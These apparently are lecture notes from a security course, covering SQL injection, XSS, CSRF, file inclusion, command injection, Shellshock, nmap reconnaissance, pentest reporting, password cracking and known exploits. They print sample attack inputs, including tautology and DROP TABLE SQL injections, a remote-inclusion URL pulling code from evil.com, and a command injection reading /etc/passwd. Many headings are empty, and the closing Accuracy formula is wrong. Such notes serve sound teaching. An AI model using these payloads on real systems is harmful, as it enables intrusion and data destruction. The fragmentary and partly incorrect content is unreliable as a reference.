Index

Web attacks

SQL Injection

Sinks (Where to Inject)

Target (What Can be Done by Injection)

SQLi: Tautologies

Tautologies are statements that are always true. They can be used as a tool for SQL injection. The most common uses include authentication bypass, and also showing all the records contained in a certain table.

Comment for SQL:
– is a standard SQL comment.
# is a MYSQL comment.

There are several examples

#1 Input: "' OR '1'='1"
Note: If mysql_escape_string() is used, we could escape this by reverse slash "\"
like this \' OR \'\'=\'
#2 Input: "' OR 1=1 # "
#3 Input: "' OR user LIKE '%' #"
#4 Input: "' OR 1 #"
#5 Input: ' OR 'vulnerability'>'server'
Note: Bypass IDS by diverging from the more obvious tautologies

SQLi: String SQLi vs. Numeric SQLi

If you are exploiting numeric SQLi, be aware of quote. There is no quote for numbers.

SELECT * 
FROM user_data
WHERE Login_Count = 1
AND userid = 1 OR 1 = 1

SQLi: Union query

The UNION operator is used to combine the result-set of two or more SELECT statements.

It is important to note that:

As an exception, in the MySQL database if the types do not match, a cast is performed automatically.

We could use this to detect the total columns in this table.

Input: "' union SELECT 1,1,1,1--"
SELECT * FROM users where username='' union SELECT 1,1,1,1--'
Note: if the table has 4 columns here it would be no error otherwise it could throws exception.

SQLi: 2nd Order Injection

2nd Order Injection occurs when malicious input value is saved in the database, and after that a new query is composed with the malicious value saved in the database.

First Input: username="admin'--"
UPDATE users SET pass='new password' WHERE user='admin'--'

SQLi: Piggy-backed/Chained

Multiple commands are executed.

As a warning, SQLi piggy-backing/chaining may not work depending on the method/function invoked to perform the query.

Input: "'; DROP TABLE users −− "
SELECT id FROM users 
WHERE user=''; 
DROP TABLE users -- ' AND pass=''

MYSQLi: Information Schema

See more at https://websec.ca/kb/sql_injection

SQLi: Blind SQLi

Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the applications response.

Common Expression Used in Exploitation

It is also common to see this using time-based techniques.

MYSQLi: File Based Technique

MySQL offers some functionalities for reading and writing file results.

Be aware of:

SELECT LOAD FILE('<file path>')
SELECT <query> INTO OUTFILE '<file path>'

SQLi: Countermeasures

Client Side Attacks

XSS

Reflected XSS

Stored XSS

DOM-based XSS

CSRF

  1. The bad guy sends a page to the victim user.
  2. The victim opens the page in his browser, thus triggering an HTTP GET request to the malicious website.
  3. The website returns an HTTP 200 response, with an HTML page and a form. The “action” tag of the form is however an external website.
  4. When the user submits the form, he sends the information to the vulnerable Web server, triggering a “fake voting service”.

Countermeasures

Client-side

CSRF Token

  1. The user browser sends an HTTP GET request to a Web server page.
  2. The Web server sends the page, and embeds a randomly generated “CSRF token” in it. The CSRF token is unique for this HTTP response, and any other user request would generate a new CSRF token.
  3. The user browser sends a post request, attaching the cookie information and the CSRF token.

In this way, the Web server has an authentication mechanism to know that the user is actually performing an operation from a Web page generated by the Web server.

Bypass Client-Side Controls

These could be bypass using dev tools or interpreter

Hidden Form Fields

<input type="hidden" name="price" value="449">

It would be shown in HTTP request ```http request price=449


### Length Limits
```html
<input type="text" name="quantity" maxlength="1">

Disable Elements

<input type="text" name="price" disabled="true" value="449">

Script based Validation

<form method="post" action="submit" onsubmit="return validateForm(this)">
</form>
<script>
    function validateForm(Form) {
        ...
    }
</script>

Local/Remote File Inclusion

<?php
include $_GET['lang'];
?>

http://site.com/test?lang=/etc/passwd

http://site.com/test?lang=http://evil.com/code.txt (causing RCE)

countermeasure

php://filter

php://filter/read=a|b/resource=f (applies filters a and b while reading f)
php://filter/write=a|b/resource=f
php://filter/a|b/resource=f (read and write)

Command Injection

<?php
$host = $_GET['host'];
system('ping -c 4 ' . $host);
?>

http://site.com/ping.php?host=a;cat%20/etc/passwd

Shellshock

character sequence: () { :;};

$ env x='() { :;}; echo vulnerable' bash -c "echo not-vulnerable"

Race Condition in Web Apps

Network Reconnaissance

Network Security Assessment

  1. Reconnaissance to identify networks, hosts, and users of interest
  2. Vulnerability scanning to identify potentially exploitable conditions
  3. Investigation of vulnerabilities and further probing by hand
  4. Exploitation of vulnerabilities and circumvention of security mechanisms

Phase 1: Reconnaissance

Reconnaissance explores the tactics to identify hosts, networks, and users of interest, and it can be either passive or active.

Phase 2: Vulnerability Scanning

Vulnerability scanning is usually supported by tools, and it may be useful to expose vulnerable or unpatched services running in a target network. Some of the most popular vulnerability scanning tools include:

In general, scanning is also useful for:

Phase 3: Investigation of Vulnerabilities

Vulnerabilities are found by “researchers”. They can then either be responsibly disclosed to the product vendor (so they can patch it), or irresponsibly to customers willing to pay for new vulnerabilities (huge black market for zero-days).

The following diagram depicts an overview of how a vulnerability can pass from the private domain to the public, either via responsible disclosure or weaponization.

Phase 4: Exploitation of Vulnerabilities

There is a plethora of tools to support also the exploitation of vulnerabilities, as we will see later in the course. Some tools include Rapid7 Metasploit, CORE Impact, Immunity CANVAS. An important remark to make is that, as we have seen in other steps of the security testing pipeline, humans cannot be replaced by tools. Also here, tools can only successfully exploit the easiest types of vulnerabilities, but it may require some scripting and exploit writing to identify and exploit real vulnerabilities in more complex systems.

Iterative Process

Passive Reconnaissance

Querying Search Engines and Websites

The following classes of data are often uncovered by querying search engines and websites:

Querying Netcraft

The Netcraft Web Application contains historical server fingerprints, which you can use to check OS versions or map network blocks of a company.

Shodan

Shodan is a service that collects network scan data results. You may identify exposed and/or unhardened services. The Metasploit tool also relies on shoran, optionally.

LinkedIn

Even if it may seem just as a social network, in practice LinkedIn - and especially LinkedIn Premium may be useful to look for people and roles without notifying them.

Domain WHOIS

The WHOIS query and response protocol contains useful public information about domain registrars (although sometimes this can be anonymized). Typically, it contains:

Automated Email Enumeration

The TheHarvester tool supports automatic search and collection of email/hosts on public search engines.

DNS Querying

By querying name servers, you may find information about registered name servers and some exposed services.

Countermeasures

Active Reconnaissance

nmap

nmap enables 10+ types of scanning methods

Host Scanning

The presence of an IP within a domain zone does not necessarily imply that the IP is reachable through Internet.
You need to verify, for each potential “target” system:

One of the first step in reconstructing a map of the target network is the automated execution of a series of ping commands on intervals of IP addresses and network blocks, to determine which systems are active
Known Techniques:

Limitation: Normally the “ping” command is used to send packets ICMP ECHO_REQUEST to a system, soliciting the return of a segment ICMP ECHO_REPLY, which indicates that the system is functioning

fping

fping -s -g 192.168.10.0/24

nmap

Unlike fping, the option -sP of nmap allows you to send in parallel:

Defense

Defense:

Counter-defense:

Port Scanning

Trying to connect to TCP and UDP ports of the target system to determine which network services are in execution (or LISTENING)
Knowing active ports offers important knowledge that can be exploited to attack a system

UDP Portscan

TCP Portscan

TCP SYN Scanning

TCP FIN Scanning

Idle Scanning

OS Fingerprinting

nmap -O ip_address

Service Enumeration

By grabbing the headers of exposed services, nmap (option -sV) can try to infer the exact service version

nmap

nmap -sV ip_address

Contermeasures

Reporting

Security Testing Activities

Vulnerability Assessment (VA)

Penetration Testing

It is a more sophisticated activity that goes beyond the tools:

Phases of Pentesting:

  1. Pre-engagement Interactions
  2. Intelligence Gathering
  3. Threat Modeling
  4. Vulnerability Analysis
  5. Exploitation
  6. Post Exploitation
  7. Reporting

Red Teaming

Reporting

Objectives

Quality

Anyone can:

Not everyone can understand what vulnerabilities actually mean.

To make client

Vulnerability Details

Common Mistakes

Social Engineering

Definition

Social Engineering is a psychological manipulation of people into revealing confidential/sensitive information of the organization or performing certain actions, such as:

Social Engineering relies on a set of non-technical strategies that exploit weaknesses of human psychology.

Phases

Key Principles

Reconnaissance

Victim Approach

Attack Vectors

Countermeasures

Password Cracking

Dictionary Attacks

A password of at least 8-12 characters could guarantee a good protection level against brute-force attacks.
Unfortunately, there are other options:

There are four main elements to initially determine security of a password:

  1. Number of symbols used in the password (e.g., a 4-digit locker would require on average 5000*2 seconds, i.e., about 3 hours)
  2. Number of possibilities for each position (e.g., an alphabetic lock with three symbols would require 262626 possibilities, i.e., an average of 5 hours instead of 17 minutes).
  3. Time required by every attempt (e.g., if 20s were required instead of 2s for every attempt, the situation would be much different, but so it would be if there would be only 2 msec for every attempt)
  4. Are there easier alternatives? Typically, an attacker does not want to leave evidences/traces, but he may be forced to break the bag

Hash Function

Cryptographic Hash Functions (CHFs) are hash functions suitable for information security applications, and have the following ideal properties:

Birthday Problem

Given an i.i.d. distribution of people, with 23 people, probability that a pair has the same birthday already at 50%

Collision Attack

Finding two inputs that generate the same hash

MD5 is a cryptographic hash function

Pre-Image Attack

Tries to find a message that has a specific hash value

Password Cracking

Brute-Force

Trying all possible passphrase combinations by enumeration until you get the right one (e.g., you get a meaningful plaintext, you access the system)

Mitigations:

Dictionary Attack

A variant of brute-force attack for password cracking or cryptanalysis in which, instead of trying all the possible password alternatives, you try only a set of passwords from a dictionary

Examples of dictionaries:

Pre-Computing Dictionary

Rainbow Table Attack

Pre-Computed Dictionary Attacks: You could precompute a list of hashes of dictionary words, and storing these in a table, so that you always know the conversion.

Space-time Trade-off: Rainbow tables reduce storage requirements at the cost of slightly longer lookup-times.

Objective: Find plaintext password
Conditions: Rainbow Table has 3 reduction functions
Step 0: I find the hash “re3xes” in /etc/shadow of the victim.
Step 1: Try Function R3, if not found, try Function R2 then R3, or R1, R2, R3 until find a keyword at the last of one of the chain (here linux23).
Step 2: Start at the first keyword of the chain, calculate until find the “re3xes” (here passwd -H-> dlcm4 -R1-> culture -H-> re3xes), therefore culture is the plaintext

Countermeasures: Rainbow Table Attacks / Pre-Computed Dictionary

Attacks can be thwarted by the use of salt

Common mistakes:

Note that using “salt” does not provide robustness to Dictionary Attacks, but only to pre-computation

Weak Passwords

Exploitation

Finding Exploits

Find

• Reliable sources (checked closely)

Always try to understand exploit code before running them

Customize

Exploits mostly do not work out of the box

Heterogeneous languages

Heartbleed

See at SSL/TLS Vulnerabilities

Dirty COW (Copy-on-Write)

Vulnerability of Linux kernel (also works for Android <= 7)
Local privilege escalation vulnerability that exploits a race condition in the implementation of the copy-on-write mechanism in the kernel’s memory-management subsystem

PHPMailer RCE

Remote code execution (RCE) vulnerability for the PHP e-mail library

Four main steps:

  1. PHPMailer gets user requests
  2. PHPMailer validates user-supplied data
  3. PHPMailer sends the data to the PHP mail() function
  4. PHPMailer then calls the OS command “sendmail” (e.g., in Linux) to actually send the e-mail (of course a mail server needs to be configured on the machine to send a message), using /usr/bin/sendmail -i -t -f <sender> as default
"attacker \" -injPar1 -injPar2"@example.com

ImageTragick

ImageMagick is an image processing library often used on the Web
Multiple vulnerabilities:

  1. CVE-2016-3714 - Insufficient shell characters filtering leads to (potentially remote) code execution
  2. CVE-2016-3718 - SSRF
  3. CVE-2016-3715 - File deletion
  4. CVE-2016-3716 - File moving
  5. CVE-2016-3717 - Local file read

Metasploit

Advanced Strategies

Stealth

Presistence

Adversarial Machine Learning

5 Phases

  1. Data Collection
  2. Pre-processing and Feature Engineering
  3. Model Selection and Training
  4. Testing and Evaluation
  5. Evaluation against Time Evolution and Adversaries

Algorithm Categories

Evaluation

$TP$: True Positives
$FP$: False Positives
$TN$: True Negatives
$FN$: False Negatives

Precision: How many selected items are relevant

$Precision = \frac{TP}{TP + FP}$

Recall: How many relevant items are selected

$Recall = \frac{TP}{TP + FN}$

F1-Score:

$F_1Score = 2 * \frac{Precision * Recall}{Precision + Recall}$

Accuracy:

$Accuracy = \frac{TP + FN}{TP + FP + TN + FN}$